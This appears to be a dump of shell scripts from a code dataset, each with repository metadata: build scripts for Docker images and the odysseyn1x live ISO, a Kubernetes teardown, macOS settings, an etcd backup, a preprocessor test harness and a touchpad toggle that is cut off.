${CLIENT_EXE} delete -n west-mesh-system -f ${BASE_URL}/${FTRAVELS}/west/west-ossm.yaml
${CLIENT_EXE} delete configmap east-ca-root-cert --from-file=root-cert.pem=east-cert.pem -n west-mesh-system
${CLIENT_EXE} delete configmap west-ca-root-cert --from-file=root-cert.pem=west-cert.pem -n east-mesh-system
${CLIENT_EXE} delete -n east-mesh-system -f ${BASE_URL}/${FTRAVELS}/east/east-federation.yaml
${CLIENT_EXE} delete -n west-mesh-system -f ${BASE_URL}/${FTRAVELS}/west/west-federation.yaml
${CLIENT_EXE} delete -n east-travel-agency -f ${BASE_URL}/${FTRAVELS}/east/east-travel-agency.yaml
${CLIENT_EXE} delete -n east-travel-portal -f ${BASE_URL}/${FTRAVELS}/east/east-travel-portal.yaml
${CLIENT_EXE} delete -n east-travel-control -f ${BASE_URL}/${FTRAVELS}/east/east-travel-control.yaml
${CLIENT_EXE} delete -n west-travel-agency -f ${BASE_URL}/${FTRAVELS}/west/west-travel-agency.yaml
declare -a arr=("east-mesh-system" "west-mesh-system" "east-travel-agency" "east-travel-portal" "east-travel-control" "west-travel-agency")
for i in "${arr[@]}"
do
if [ "${IS_OPENSHIFT}" == "true" ]; then
${CLIENT_EXE} delete project ${i}
else
${CLIENT_EXE} delete ns ${i} --ignore-not-found=true
fi
done
fi | true |
cf9d4112a0cf9ff7898916e69d7bb2ba2c406008 | Shell | kevinnguyenai/fusionpbx-docker-workshop | /build-freeswitch.sh | UTF-8 | 186 | 2.890625 | 3 | [] | no_license | #!/bin/bash
PLATFORM=$1
if [[ -z $1 ]]; then
PLATFORM=linux/arm/v7,linux/amd64
fi
pushd freeswitch
docker buildx build --platform ${PLATFORM} --push -t crazyquark/freeswitch .
popd | true |
d261c89313cfd4ffef1ceb95dbe2cbc45ff8d8bd | Shell | johndbritton/dotfiles | /preferences/macos/core | UTF-8 | 1,344 | 2.609375 | 3 | [] | no_license | #!/bin/zsh
set -e
# Set lock screen message
sudo defaults write /Library/Preferences/com.apple.loginwindow \
LoginwindowText \
"Found this computer? Please contact John Britton at public@johndbritton.com."
# Check for software updates daily
defaults write com.apple.SoftwareUpdate ScheduleFrequency -int 1
# Disable shadow in screenshots
defaults write com.apple.screencapture disable-shadow -bool true
# Save to disk (not to iCloud) by default
defaults write NSGlobalDomain NSDocumentSaveNewDocumentsToCloud -bool false
# Expand save panel by default
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode -bool true
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode2 -bool true
# Enable full keyboard access for all controls
# (e.g. enable Tab in modal dialogs)
defaults write NSGlobalDomain AppleKeyboardUIMode -int 3
# Use scroll gesture with the Ctrl (^) modifier key to zoom
sudo defaults write com.apple.universalaccess closeViewScrollWheelToggle -bool true
sudo defaults write com.apple.universalaccess HIDScrollZoomModifierMask -int 262144
# Follow the keyboard focus while zoomed in
sudo defaults write com.apple.universalaccess closeViewZoomFollowsFocus -bool true
# Disable user interface sound effects
defaults write com.apple.systemsound "com.apple.sound.uiaudio.enabled" -int 0
echo 'Configured Core preferences'
| true |
ad04c56f06c507ab29ca5afe0818362040a48b12 | Shell | iwcs15-hack/semantic-sounds | /code/every-pair.sh | UTF-8 | 212 | 2.625 | 3 | [] | no_license | #
# every-pair.sh, 17 Apr 15
file="$1"
IFS=","
while read w1 w2 n1 n2 n3 n4; do
echo -n "$w1,$w2,$n1,$n2,$n3,$n4,"
echo "$w1 $w2" | ../../sounds/slike.0.1.3/slike -gen phon | ./levdist
done < "$file"
| true |
4adc4a2ac5fb87894205db13d5a16411ac61c34e | Shell | giriraj789/ose-backup-restore | /scripts/backup_etcd.sh | UTF-8 | 474 | 3.109375 | 3 | [] | no_license | #!/bin/sh
set -e
# env variables you may want to change
BACKUPDIR=${BACKUPDIR:-"/ose_cluster_backup/etcd-data"}
hotdir="${BACKUPDIR}/hot/$(date +%Y%m%d%H%M).etcd"
mkdir -p $hotdir
. /etc/etcd/etcd.conf
echo "backuping the data directory to $hotdir"
etcdctl backup --data-dir ${ETCD_DATA_DIR} --backup-dir $hotdir
if [[ -e ${ETCD_DATA_DIR}/member/snap/db ]]; then
cp -a ${ETCD_DATA_DIR}/member/snap/db ${hotdir}/member/snap/
fi
echo
du -ksh $hotdir
find $hotdir
| true |
74403ab2cf3a250cbae17fbebd85128ad4032ff8 | Shell | raspberryenvoie/odysseyn1x | /build.sh | UTF-8 | 8,741 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/bin/sh
# Made with <3 by raspberryenvoie
# odysseyn1x build script (a fork of asineth/checkn1x)
# Exit if user isn't root
[ "$(id -u)" -ne 0 ] && {
echo 'Please run as root'
exit 1
}
# Change these variables to modify the version of checkra1n
CHECKRA1N_AMD64='https://assets.checkra.in/downloads/linux/cli/x86_64/dac9968939ea6e6bfbdedeb41d7e2579c4711dc2c5083f91dced66ca397dc51d/checkra1n'
CHECKRA1N_I686='https://assets.checkra.in/downloads/linux/cli/i486/77779d897bf06021824de50f08497a76878c6d9e35db7a9c82545506ceae217e/checkra1n'
GREEN="$(tput setaf 2)"
BLUE="$(tput setaf 6)"
NORMAL="$(tput sgr0)"
cat << EOF
${GREEN}############################################${NORMAL}
${GREEN}# #${NORMAL}
${GREEN}# ${BLUE}Welcome to the odysseyn1x build script ${GREEN}#${NORMAL}
${GREEN}# #${NORMAL}
${GREEN}############################################${NORMAL}
EOF
# Ask for the version and architecture if variables are empty
while [ -z "$VERSION" ]; do
printf 'Version: '
read -r VERSION
done
until [ "$ARCH" = 'amd64' ] || [ "$ARCH" = 'i686' ]; do
echo '1 amd64'
echo '2 i686'
printf 'Which architecture? amd64 (default) or i686 '
read -r input_arch
[ "$input_arch" = 1 ] && ARCH='amd64'
[ "$input_arch" = 2 ] && ARCH='i686'
[ -z "$input_arch" ] && ARCH='amd64'
done
# Delete old build
{
umount work/chroot/proc
umount work/chroot/sys
umount work/chroot/dev
} > /dev/null 2>&1
rm -rf work/
set -e -u -v
start_time="$(date -u +%s)"
# Install dependencies to build odysseyn1x
apt-get update
apt-get install -y --no-install-recommends wget debootstrap grub-pc-bin \
grub-efi-amd64-bin mtools squashfs-tools xorriso ca-certificates curl \
libusb-1.0-0-dev gcc make gzip xz-utils unzip libc6-dev
if [ "$ARCH" = 'amd64' ]; then
REPO_ARCH='amd64' # Debian's 64-bit repos are "amd64"
KERNEL_ARCH='amd64' # Debian's 32-bit kernels are suffixed "amd64"
else
# Install depencies to build odysseyn1x for i686
dpkg --add-architecture i386
apt-get update
apt install -y --no-install-recommends libusb-1.0-0-dev:i386 gcc-multilib
REPO_ARCH='i386' # Debian's 32-bit repos are "i386"
KERNEL_ARCH='686' # Debian's 32-bit kernels are suffixed "-686"
fi
# Configure the base system
# Create the chroot target plus the ISO staging tree (live/ will hold the
# squashfs, boot/grub/ the bootloader configuration).
mkdir -p work/chroot work/iso/live work/iso/boot/grub
# Bootstrap a minimal Debian stable into work/chroot for the selected arch.
debootstrap --variant=minbase --arch="$REPO_ARCH" stable work/chroot 'http://mirror.xtom.com.hk/debian/'
# Bind-mount the host's kernel interfaces so package installation inside
# the chroot works; these are unmounted again before the ISO is packed.
mount --bind /proc work/chroot/proc
mount --bind /sys work/chroot/sys
mount --bind /dev work/chroot/dev
# Give the chroot working DNS (removed again before mksquashfs runs).
cp /etc/resolv.conf work/chroot/etc
# NOTE: the heredoc delimiter is unquoted, so $KERNEL_ARCH below is expanded
# by the *host* shell before the script is piped into the chroot.
cat << EOF | chroot work/chroot /bin/bash
# Set debian frontend to noninteractive
export DEBIAN_FRONTEND=noninteractive
# Install requiered packages
apt-get install -y --no-install-recommends linux-image-$KERNEL_ARCH live-boot \
    systemd systemd-sysv usbmuxd libusbmuxd-tools openssh-client sshpass xz-utils whiptail
# Remove apt as it won't be usable anymore
apt purge apt -y --allow-remove-essential
EOF
# Change initramfs compression to xz
sed -i 's/COMPRESS=gzip/COMPRESS=xz/' work/chroot/etc/initramfs-tools/initramfs.conf
# Regenerate the initramfs inside the chroot so the xz setting takes effect.
chroot work/chroot update-initramfs -u
# Prune files that are useless on a read-only live system to shrink the
# squashfs.  Runs in a subshell so the cd does not leak into the rest of
# the script.
(
    cd work/chroot
    # Empty some directories to make the system smaller
    rm -f etc/mtab \
        etc/fstab \
        etc/ssh/ssh_host* \
        root/.wget-hsts \
        root/.bash_history
    # NOTE(review): usr/lib/modules/* is pruned here, after the initramfs
    # has been generated — presumably the live system does not need to load
    # extra kernel modules at runtime; verify before changing.
    rm -rf var/log/* \
        var/cache/* \
        var/backups/* \
        var/lib/apt/* \
        var/lib/dpkg/* \
        usr/share/doc/* \
        usr/share/man/* \
        usr/share/info/* \
        usr/share/icons/* \
        usr/share/locale/* \
        usr/share/zoneinfo/* \
        usr/lib/modules/*
)
# Copy scripts
# Install the repository's helper scripts into the image's PATH.
cp scripts/* work/chroot/usr/bin/
# Download resources for odysseyra1n
mkdir -p work/chroot/root/odysseyra1n/
(
    cd work/chroot/root/odysseyra1n/
    # One -O per URL keeps each download under its original filename.
    curl -sL -O https://github.com/coolstar/Odyssey-bootstrap/raw/master/bootstrap_1500.tar.gz \
        -O https://github.com/coolstar/Odyssey-bootstrap/raw/master/bootstrap_1600.tar.gz \
        -O https://github.com/coolstar/Odyssey-bootstrap/raw/master/bootstrap_1700.tar.gz \
        -O https://github.com/coolstar/Odyssey-bootstrap/raw/master/org.coolstar.sileo_2.3_iphoneos-arm.deb \
        -O https://github.com/coolstar/Odyssey-bootstrap/raw/master/org.swift.libswift_5.0-electra2_iphoneos-arm.deb
    # Change compression format to xz
    # (recompress the bootstraps gzip -> xz for a smaller ISO)
    gzip -dv ./*.tar.gz
    xz -v9e -T0 ./*.tar
)
# Fetch the Android/Linux Sandcastle bundles from checkra.in (content-addressed
# URLs, pinned by hash) and strip the macOS-only pieces.  Subshells keep each
# cd scoped.
(
    cd work/chroot/root/
    # Download resources for Android Sandcastle
    curl -L -O 'https://assets.checkra.in/downloads/sandcastle/dff60656db1bdc6a250d3766813aa55c5e18510694bc64feaabff88876162f3f/android-sandcastle.zip'
    unzip android-sandcastle.zip
    rm -f android-sandcastle.zip
    (
        cd android-sandcastle/
        # Drop macOS binaries/scripts and docs that the live ISO cannot use.
        rm -f iproxy ./*.dylib load-linux.mac ./*.sh README.txt
    )
    # Download resources for Linux Sandcastle
    curl -L -O 'https://assets.checkra.in/downloads/sandcastle/0175ae56bcba314268d786d1239535bca245a7b126d62a767e12de48fd20f470/linux-sandcastle.zip'
    unzip linux-sandcastle.zip
    rm -f linux-sandcastle.zip
    (
        cd linux-sandcastle/
        rm -f load-linux.mac README.txt
    )
)
# Build the Project Sandcastle loader and fetch checkra1n, both straight into
# the image's /usr/bin.
(
    cd work/chroot/usr/bin/
    curl -L -O 'https://raw.githubusercontent.com/corellium/projectsandcastle/master/loader/load-linux.c'
    # Build load-linux.c and download checkra1n for the corresponding architecture
    # NOTE(review): CHECKRA1N_AMD64 / CHECKRA1N_I686 are not set anywhere in
    # this section — presumably defined earlier in the file or exported in the
    # environment (set -u would abort here otherwise); verify.
    if [ "$ARCH" = 'amd64' ]; then
        gcc load-linux.c -o load-linux -lusb-1.0
        curl -L -o checkra1n "$CHECKRA1N_AMD64"
    else
        # -m32: emit a 32-bit binary to match the i686 userland.
        gcc -m32 load-linux.c -o load-linux -lusb-1.0
        curl -L -o checkra1n "$CHECKRA1N_I686"
    fi
    rm -f load-linux.c
    chmod +x load-linux checkra1n
)
# Configure linux-apple
(
    cd work/chroot/usr/bin
    # Build pongoterm.c for the corresponding architecture
    # load-linux.c does not work as there is no baked in initramfs
    curl -L -O https://github.com/konradybcio/pongoOS/raw/master/scripts/pongoterm.c
    # Same flags for both arches apart from the target word size (-m64/-m32);
    # USE_LIBUSB selects the libusb transport in pongoterm.
    if [ "$ARCH" = 'amd64' ]; then
        gcc -Wall -Wextra -Os -m64 pongoterm.c -DUSE_LIBUSB=1 -o pongoterm -lusb-1.0 -lpthread
    else
        gcc -Wall -Wextra -Os -m32 pongoterm.c -DUSE_LIBUSB=1 -o pongoterm -lusb-1.0 -lpthread
    fi
    rm -f pongoterm.c
)
# Download resources for linux-apple
(
    cd work/chroot/root
    mkdir linux-apple
    cd linux-apple
    # Download DeviceTree, 4K, 16K kernels and initramfs.
    # -OOOOO = five -O flags, one per URL below (keep original filenames).
    # NOTE(review): these are Discord CDN attachment links, which can expire;
    # the build will fail at this step if they do — consider mirroring them.
    curl -L -OOOOO \
        https://cdn.discordapp.com/attachments/672628720497852459/1023930400365625344/netboot_debug_initrd.img \
        https://cdn.discordapp.com/attachments/672628720497852459/1024873433567350794/dtbpack \
        https://cdn.discordapp.com/attachments/672628720497852459/1024873433982578718/Image.lzma-16k \
        https://cdn.discordapp.com/attachments/672628720497852459/1024873434334892063/Image.lzma-4k \
        https://cdn.discordapp.com/attachments/672628720497852459/1025036488414593085/Pongo.bin
)
# Download A8X/A9X resources
(
    cd work/chroot/root
    curl -L -O https://cdn.discordapp.com/attachments/672628720497852459/1025048286916251668/PongoConsolidated.bin
)
# Configure autologin: drop in a systemd override so tty1 logs root in
# automatically when the live system boots.
override_dir='work/chroot/etc/systemd/system/getty@tty1.service.d'
mkdir -p "$override_dir"
# Quoted delimiter: the unit file is written verbatim (it contains no shell
# expansions anyway; %I is a systemd specifier, not a shell variable).
cat > "$override_dir/override.conf" << 'EOF'
[Service]
ExecStart=
ExecStart=-/sbin/agetty --noissue --autologin root %I
Type=idle
EOF
# Configure grub
# Quoted delimiter ("EOF"): the banner's backslashes, backticks and any $
# are written literally into grub.cfg.  The echo lines are grub-script
# echoes that draw the boot banner; the kernel/initrd copied into
# work/iso/boot later in this script are what linux/initrd load here.
cat << "EOF" > work/iso/boot/grub/grub.cfg
insmod all_video
echo ''
echo ' ___ __| |_ _ ___ ___ ___ _ _ _ __ / |_ __'
echo ' / _ \ / _` | | | / __/ __|/ _ \ | | | `_ \| \ \/ /'
echo '| (_) | (_| | |_| \__ \__ \ __/ |_| | | | | |> < '
echo ' \___/ \__,_|\__, |___/___/\___|\__, |_| |_|_/_/\_\'
echo ' |___/ |___/ '
echo ''
echo ' Made with <3 by raspberryenvoie'
linux /boot/vmlinuz boot=live quiet
initrd /boot/initrd.img
boot
EOF
# Change hostname and configure .bashrc
printf '%s\n' 'odysseyn1x' > work/chroot/etc/hostname
# Root's .bashrc: export the build version, then launch the menu on login.
{
    printf "export ODYSSEYN1X_VERSION='%s'\n" "$VERSION"
    printf '%s\n' '/usr/bin/odysseyn1x_menu'
} > work/chroot/root/.bashrc
# resolv.conf was only needed for network access during the chroot setup.
rm -f work/chroot/etc/resolv.conf
# Build the ISO
# Undo the bind mounts from the setup phase so the squashfs does not pick
# up the host's /proc, /sys and /dev.
umount work/chroot/proc
umount work/chroot/sys
umount work/chroot/dev
# Copy the kernel/initrd (links created by the linux-image install in the
# chroot root) next to grub; grub.cfg boots them from /boot on the ISO.
cp work/chroot/vmlinuz work/iso/boot
cp work/chroot/initrd.img work/iso/boot
# Pack the root filesystem: -e boot excludes the chroot's boot directory
# (already copied above), xz with the x86 BCJ filter for best compression.
mksquashfs work/chroot work/iso/live/filesystem.squashfs -noappend -e boot -comp xz -Xbcj x86
# Assemble the hybrid BIOS/EFI ISO; empty fonts/locales/themes keep it small.
grub-mkrescue -o "odysseyn1x-$VERSION-$ARCH.iso" work/iso \
    --compress=xz \
    --fonts='' \
    --locales='' \
    --themes=''
end_time="$(date -u +%s)"
elapsed_time="$((end_time - start_time))"
echo "Built odysseyn1x-$VERSION-$ARCH in $((elapsed_time / 60)) minutes and $((elapsed_time % 60)) seconds."
| true |
cb9bfd43a0c83aff1ebfb7f5325b37f85d0c1a30 | Shell | dmc-uilabs/dmcacons | /deleteWorkspace.sh | UTF-8 | 564 | 3.734375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# Print usage help on stdout and abort the script with a non-zero status.
DisplayUsage() {
cat << EOM
USAGE:
Enter the id of the workspace you wish to delete.
./deleteWorkspace.sh some_id
EOM
exit 1
} # fixed: was "}1", which never closed the function body (syntax error)
#
# Minimum args
#
if [ $# -lt 1 ]
then
    DisplayUsage
fi
id="$1"
# The id is interpolated straight into the SQL string below, so reject
# anything that is not purely numeric to prevent SQL injection.
case "$id" in
    ''|*[!0-9]*)
        echo "Workspace id must be numeric, got: '$id'"
        exit 1
        ;;
esac
# "Soft delete": flip the workspace's webdav flag rather than removing the row.
user=$(psql -U postgres -d gforge -c "UPDATE groups SET use_webdav='0' WHERE group_id='$id';")
# Quoted so psql's output is printed verbatim (no word splitting/globbing).
echo "$user"
# psql reports a successful single-row UPDATE with the command tag "UPDATE 1";
# the original "(1 rows)" pattern is kept for backward compatibility.
if [[ $user == *"UPDATE 1"* || $user == *"(1 rows)"* ]]
then
    echo "Soft Deleted the workspace with id='$id'";
else
    echo "Something went wrong call the ghost busters"
fi
| true |
45f724d43eae68ad2bbf34fd31545df3aeee5a12 | Shell | SwarmKit/dockerfiles | /emby/build.sh | UTF-8 | 1,517 | 4.09375 | 4 | [] | no_license | #!/bin/bash
# Directory this script lives in; $0 quoted so paths with spaces work.
FOLDER=$(dirname "$0")
# First CLI argument: pass "push" to publish the built images.
DOCKER_PUSH=$1
# ANSI escape prefixes for coloured log output (interpreted by echo -e).
CSI="\033["
CEND="${CSI}0m"
CRED="${CSI}1;31m"
CGREEN="${CSI}1;32m"
CYELLOW="${CSI}1;33m"
CBLUE="${CSI}1;34m"
# Download dependencies (base image referenced by the Dockerfile)
docker pull xataz/alpine:3.4
# Build an image from a Dockerfile directory; exits the script on failure.
#   $1 - full image tag (e.g. xataz/emby:latest)
#   $2 - build context directory containing the Dockerfile
build() {
    image_name=$1
    image_dir=$2
    # Was ${CBUILD}, which is never defined anywhere; use the blue colour.
    echo -e "${CBLUE}Build ${image_name} on ${image_dir}${CEND}"
    if docker build -t "${image_name}" "${image_dir}"; then
        echo -e "${CGREEN} --- "
        echo -e "Successfully built ${image_name} with context ${image_dir}"
        echo -e " --- ${CEND}"
    else
        echo -e "${CRED} --- "
        # Report the tag that was actually built (the original printed
        # ${USER}/${image_name}, which does not match the success message).
        echo -e "Failed built ${image_name} with context ${image_dir}"
        echo -e " --- ${CEND}"
        exit 1
    fi
}
# Publish an image, but only when the caller asked for it by passing "push"
# as the script's first argument (stored in the global DOCKER_PUSH).
push() {
    image_name=$1
    [ "$DOCKER_PUSH" = "push" ] || return 0
    printf '%s\n' "${CYELLOW}Push ${image_name}${CEND}"
    docker push ${image_name}
    printf '%s\n' "${CYELLOW} --- "
    printf '%s\n' "Successfully push ${image_name}"
    printf '%s\n' " --- ${CEND}"
}
# Build emby
## Latest
# Extract every tag listed on the Dockerfile's tags="..." line and build
# (and optionally push) one image per tag.  The command substitution is
# intentionally unquoted: the tags are whitespace-separated words.
for tag in $(grep 'tags=' "$FOLDER/Dockerfile" | cut -d'"' -f2); do
    if build "xataz/emby:$tag" "$FOLDER"; then
        push "xataz/emby:$tag"
    fi
done
c40f9b94a93434f4ee6c365abb48cab1e8d4a622 | Shell | jimjdeal/Arma-3-Scripts | /_makeNewServer | UTF-8 | 928 | 3.890625 | 4 | [] | no_license | #!/bin/bash
# Target directory name: first CLI argument, or prompted for interactively.
folderName=$1
if [ -z "$folderName" ]; then
    echo Hello! What would you want the new directory to be called?
fi
while [ -z "$folderName" ]; do
    # -r: do not mangle backslashes; abort on EOF instead of looping forever.
    read -r folderName || exit 1
    # Intentionally unquoted: word-splitting collapses runs of whitespace
    # before tr maps the remaining single spaces to underscores.
    # shellcheck disable=SC2086
    folderName=$(echo $folderName | tr ' ' '_')
    if [ -z "$folderName" ]; then
        echo New folder Name can not be empty!
    fi
done
# Create the new server directory as symlinks into A3Master, with its own
# real logs/keys/mpmissions directories and a copy of the shared _A3Files.
echo Making directory...
mkdir "$folderName"
echo "Making symbolic links for $folderName"
ln -sr "./A3Master/"* "./$folderName/"
echo Removing keys, logs, and mpmissions
for removeThese in logs keys mpmissions; do
    # Removes the symlink itself (not the target), so it can be replaced
    # with a per-server directory below.
    rm "./$folderName/$removeThese"
done
echo Making keys, logs and mpmissions as actual folders
for removeThese in logs keys mpmissions; do
    mkdir "./$folderName/$removeThese"
done
echo Copying main files from _A3Files...
# Options before operands for portability (was: cp SRC DST -r).
cp -r "./_A3Files/"* "./$folderName/"
echo Making mods.txt
touch "$folderName/mods.txt"
echo Good Luck
5e6ae832788d1de2e3ead8aae18726858577346e | Shell | JadLevesque/order-pp | /test/Test-shell | ISO-8859-1 | 8,764 | 3.859375 | 4 | [
"BSL-1.0"
] | permissive | #!/bin/bash
# (C) Copyright Vesa Karvonen 2004.
#
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE.)
set -e
TIMEFORMAT='Time: %R seconds'
dbFile=test.db
tmpFile=.test.tmp
debugFlag=1
function check-and-add-preprocessor {
if $1 >& /dev/null ; then
availablePreprocessors="[$2] $availablePreprocessors"
fi
}
if ! test -f .preprocessor ; then
availablePreprocessors=''
check-and-add-preprocessor "cpp --help" cpp
check-and-add-preprocessor "wave -v" wave
read -e -p "Choose preprocessor: $availablePreprocessors? "
if test "$(echo "$availablePreprocessors" | grep "\\[$REPLY\\]")" != "$availablePreprocessors" ; then
echo "
Sorry, \"$REPLY\" isn't one of the preprocessors:
$availablePreprocessors
If you wish to use another preprocessor, you need to customize this
script for the preprocessor, because there is no standard on the
command line options accepted by a preprocessor."
exit 1
fi
echo "$REPLY" > .preprocessor
echo "Wrote $REPLY to the .preprocessor file."
fi
preprocessor=$(cat .preprocessor)
function eval-in-cpp {
cpp -P \
-std=c99 \
-Wall \
-pedantic-errors \
$(if test $debugFlag = 1 ; then echo '-DORDER_PP_DEBUG' ; fi) \
-I "../inc/" \
-I "../../chaos-pp/" \
-include "../inc/order/interpreter.h" \
-include "test-defs.h"
}
function eval-in-wave {
wave --variadics \
$(if test $debugFlag = 1 ; then echo '--define ORDER_PP_DEBUG' ; fi) \
--include "../inc/" \
--include "../../chaos-pp/" \
--forceinclude "order/interpreter.h" \
--forceinclude "test-defs.h"
}
function eval-in {
eval-in-$preprocessor
}
function spacify {
sed -e 's|,| , |g' \
-e 's|(| ( |g' \
-e 's|)| ) |g' \
-e 's| \+| |g'
}
function sed-from {
local tmp="$1"
shift 1
echo "$tmp" | sed "$@"
}
function test-cnt {
cat $dbFile | wc -l | sed 's# ##g'
}
function get-line {
head -n $(($1+1)) | tail -n1
}
function get-line-from {
echo "$2" | get-line $1
}
function get-test {
cat $dbFile | get-line $1
}
function add-test {
echo "$1#$2#$3" >> $dbFile
clean-test-db
}
function clean-test-db {
local tmp="$(cat $dbFile)"
echo "$tmp" | sort | uniq > $dbFile
}
function remove-test {
local lines=$(test-cnt)
local before=$(head -n $1 $dbFile)
local after=$(tail -n $(($lines-1-$1)) $dbFile)
echo -n > $dbFile
if test "$before" != "" ; then echo "$before" >> $dbFile ; fi
if test "$after" != "" ; then echo "$after" >> $dbFile ; fi
}
function replace-test {
local lines=$(test-cnt)
local before=$(head -n $1 $dbFile)
local after=$(tail -n $(($lines-1-$1)) $dbFile)
echo -n > $dbFile
if test "$before" != "" ; then echo "$before" >> $dbFile ; fi
add-test "$2" "$3" "$4"
if test "$after" != "" ; then echo "$after" >> $dbFile ; fi
}
function preprocess-positive-tests {
sed -e 's|^.*#.*#O.*$||g' \
-e 's|#.*||g' \
-e 's|^\(.\+\)$|ORDER_PP(\1)|g' \
$dbFile | \
spacify | \
eval-in | \
tail -n $(test-cnt)
}
function differing-lines {
echo "$1" | \
nl -s '#' -v 0 | \
grep -v -e "^\\($(echo -n "$2" | sed 's#\([^a-zA-Z0-9()?+|{, ]\)#\\\1#g' | nl -s '#' -v 0 | tr "\n" '$' | sed 's#\$#\\\|#g')\\)\$" | \
sed -e 's|#.*||g' -e 's|[ \t]||g' | tr "\n" ' '
}
function run-tests {
echo "Total of $(test-cnt) tests."
echo "Running positive tests..."
local allTerm=$(sed -e 's|#.*||g' $dbFile)
local allExpected=$(sed -e 's|^[^#]*#||g' -e 's|#.*$||g' $dbFile)
local allErrors=$(sed -e 's|.*#||g' $dbFile)
local posActual=$(preprocess-positive-tests)
local posExpected=$(sed -e 's|^.*#.*#O.*$||g' -e 's|^[^#]*#||g' -e 's|#.*$||g' $dbFile)
echo "Comparing results..."
for i in $(differing-lines "$posActual" "$posExpected") ; do
term=$(get-line-from $i "$allTerm")
local result=$(get-line-from $i "$posActual")
local expected=$(get-line-from $i "$posExpected")
echo "Term: $term"
echo "Expected: $expected"
echo "Result: $result"
read -e -n 1 -p "[(U)se result | (R)emove test| Skip]? "
case "$REPLY" in
("u"|"U")
echo "Using result"
replace-test $i "$term" "$result" "" ;;
("r"|"R")
echo "Removing test"
remove-test $i ;;
(*)
echo "Skipping" ;;
esac
done
echo "Running and comparing negative tests..."
local oldDebugFlag=$debugFlag
debugFlag=1
for i in $(differing-lines "$(sed -e 's|.*#.*#O.*|\$|g' -e 's|[^$]\+|#|g' $dbFile)" "$(sed -e 's|.\+|#|g' $dbFile)") ; do
term=$(get-line-from $i "$allTerm")
local expectedResult=$(get-line-from $i "$allExpected")
local expectedErrors=$(get-line-from $i "$allErrors")
do-eval
if test "$result#$errors" != "$expectedResult#$expectedErrors" ; then
echo "Term: $term"
echo "Expected result: $expectedResult"
echo "Actual result: $result"
echo "Expected error: $expectedErrors"
echo "Actual error: $errors"
read -e -n 1 -p "[(U)se result | (R)emove test| Skip]? "
case "$REPLY" in
("u"|"U")
echo "Using result"
replace-test $i "$term" "$result" "$errors" ;;
("r"|"R")
echo "Removing test"
remove-test $i ;;
(*)
echo "Skipping" ;;
esac
fi
done
debugFlag=$oldDebugFlag
}
function do-eval {
result=$(echo "ORDER_PP($term)" | spacify | eval-in 2>"$tmpFile" | tail -n1)
resultChars=$(echo "$result" | wc -m | sed 's# ##g')
resultLines=$(echo "$result" | wc -l | sed 's# ##g')
messages="$(cat "$tmpFile")"
if test -n "$messages" ; then
errors=$(echo "$messages" | grep -o 'ORDER_PP_[a-zA-Z0-9_]\+' | sort | uniq | tr $'\n' ' ' | sed 's# $##g')
else
errors=""
fi
}
function interactive-eval {
read -e -p "Term: "
if test "$REPLY" != "" ; then
term="$REPLY"
else
echo "Term: $term"
fi
time do-eval
if test -n "$messages" ; then
echo "Errors: $errors"
echo
echo "$messages"
echo
fi
if test $(($COLUMNS-9)) -lt $resultChars ; then
echo "The output contains $resultChars characters on $resultLines lines!"
read -e -n 1 -p "[(S)kip | (L)ess | Display]? "
case "$REPLY" in
("l"|"L")
echo "Result: $result" | less ;;
("s"|"S")
echo "Skipping" ;;
(*)
echo "Result: $result" ;;
esac
else
echo "Result: $result"
fi
}
function interactive-trace {
read -e -p "Term: "
if test "$REPLY" != "" ; then
term="$REPLY"
else
echo "Term: $term"
fi
local steps=0
result=$(echo "(,,ORDER_PP_DEF($(echo "$term" | spacify)),8EXIT,)" | eval-in)
echo ": $result"
while read -e -n 1 -p "[(#$steps) | Enter to step]? " ; do
if test "$REPLY" != "" ; then
break
fi
steps=$(($steps+1))
result=$(echo "ORDER_PP_CM_DN_0 $result" | eval-in)
echo ": $result"
if ! echo "$result" | grep -q '^(' ; then
echo "[ Program stopped. ]"
break
fi
done
}
function interactive-add-test {
interactive-eval
read -e -n 1 -p "Add [(N)o | Yes]? "
case "$REPLY" in
("n"|"N")
echo "Not added.";;
(*)
add-test "$term" "$result" "$errors"
echo "Added." ;;
esac
}
echo "Database: $dbFile"
if ! cp -r $dbFile $dbFile.bak ; then
echo "Backup failed. Terminating."
exit
else
echo "Backed up database to: $dbFile.bak"
fi
# IFS=''
REPLY=''
while true ; do
if test -z "$REPLY" ; then
if test "$#" -gt 0 ; then
REPLY="$(echo "$1" | sed 's#^-*##g')"
shift
else
read -e -n 1 -p "[(A)dd | (C)lean | (D)ebug | (M)ode: $debugFlag | (Q)uit | (S)how | (T)est | Eval]? "
fi
fi
case "$REPLY" in
(a*|A)
interactive-add-test ;;
(t*|T)
time run-tests ;;
(s*|S)
less $dbFile ;;
(c*|C)
clean-test-db ;;
(q*|Q)
exit ;;
(d*|D)
interactive-trace ;;
(m*|M)
debugFlag=$((1-debugFlag)) ;;
(*)
interactive-eval
REPLY="" ;;
esac
REPLY="$(echo "$REPLY" | sed 's#^.##g')"
done
| true |
d514b8f1d7aaa10e11bf16727e3d66d2e409c562 | Shell | kpu/elrc-scrape | /download_json.sh | UTF-8 | 159 | 2.609375 | 3 | [
"LicenseRef-scancode-public-domain"
] | permissive | #!/bin/bash
for ((i=0;i<5000;++i)); do if [ ! -s $i.json ]; then echo wget -O $i.json https://www.elrc-share.eu/repository/export_json/$i/; fi; done |parallel
| true |
527cec01c65452f5d78cbb8d6cd32c33adc522c8 | Shell | lucionardelli/dotfiles | /touchpad.sh | UTF-8 | 1,306 | 4.28125 | 4 | [] | no_license | #!/bin/bash -e
for i in "$@"
do
case $i in
-e|--enable)
ENABLE=1
shift # past argument with no value
;;
-d|--disable)
DISABLE=1
shift # past argument with no value
;;
-s=*|--sleep=*)
SLEEP_S="${i#*=}"
shift # past argument=value
;;
-h|--help)
HELP=1
shift # past argument with no value
;;
*)
# unknown option
echo "Unknown option $i"
exit
;;
esac
done
if [[ -n $HELP ]]; then
echo
echo "Enable (-e|--enable) or disable (-d|--disable) touchpad."
echo "Examples"
echo "\tSleep 10 secs, then enable:"
echo "\t\t$0 --enable --sleep=10"
echo
echo "\tDisable:"
echo "\t\t$0 --disable"
echo
exit
fi
if [[ -z $ENABLE ]] && [[ -z $DISABLE ]]; then
echo "Missing command, either enable or disable. aborting..."
exit
else
TOUCHPAD=`xinput --list --name-only | grep -i touch` || true
if [[ -z $TOUCHPAD ]]; then
